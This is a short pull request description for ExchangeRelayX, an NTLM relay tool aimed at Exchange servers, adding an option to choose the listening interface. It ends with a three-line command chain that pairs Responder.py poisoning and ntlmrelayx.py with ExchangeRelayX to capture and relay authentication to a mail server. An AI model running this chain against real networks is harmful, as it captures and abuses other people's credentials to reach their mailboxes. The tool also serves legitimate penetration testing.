ExchangeRelayX
ExchangeRelayX copied to clipboard
Add ability to select interface
This adds the argparse parameter -i for interface to allow the operator to select a specific interface for ExchangeRelayX to listen on. Defaults to 0.0.0.0.
The use case is utilizing ExchangeRelayX with Responder.py and ntlmrelayx.py (or a similar toolset) to generate hashes and relay them to ExchangeRelayX. ExchangeRelayX can listen on the loopback interface and receive authentication attempts from ntlmrelayx.
./Responder.py -I <interface> -r -d -w
./ntlmrelayx.py -ip <interface IP> -t 127.0.0.1
./exchangeRelayx.py -t https://mail.example.com -i 127.0.0.1